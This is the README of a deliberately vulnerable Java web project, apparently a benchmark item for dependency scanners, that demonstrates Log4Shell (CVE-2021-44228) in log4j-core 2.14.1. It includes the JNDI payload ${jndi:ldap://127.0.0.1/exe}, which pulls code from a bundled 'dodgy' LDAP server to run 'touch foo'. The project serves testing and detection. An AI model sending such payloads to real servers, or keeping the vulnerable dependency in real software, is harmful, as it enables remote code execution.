This is a simple web project with a log4shell vulnerability.
The project defines a simple scabench.HelloWorldService
get service returning a plain text string hello world
.
The service does not expect parameters, and if parameters are encountered, an error
is logged.
The vulnerable dependency is org.apache.logging.log4j:log4j-core:2.14.1, the vulnerability is CVE-2021-44228.
This requires unix or macos. It is easy to port this project to windows.
A unit test is provided to demonstrate the vulnerability. The test requires a ldap server providing vulnerable code, the respective executable is provided by the project, it is defined in a separate project https://github.com/jensdietrich/Log4J-RCE-Proof-Of-Concept based on https://github.com/HyCraftHD/Log4J-RCE-Proof-Of-Concept. The test fixture will handle startup and shutdown of the ldap server.
The test will create a file foo
based on a command encoded embedded in the code of the ldap server the log4j connects to
(touch foo
). This server can be controlled by an attacker.
To run the test build the project with mvn test
.
- start the embedded web server:
mvn jetty:run
- start the included the ldap server:
java -jar dodgy-ldap-server.jar
(the vulnerable copde will download Java code from this server) - point the browser to
http://localhost:8080/
, this site contains a pre-populated form with a malicious payload${jndi:ldap://127.0.0.1/exe}
- submit this form
- this will create a file
foo
on the server
There are several sh scripts to run different analyses, result resports can be found in scan-results
.
The pom.xml
has a plugin to generate a SBOM in CycloneDX format.
To do this, run mvn cyclonedx:makePackageBom
, the SBOM can be found in
target/
in json
and xml
format.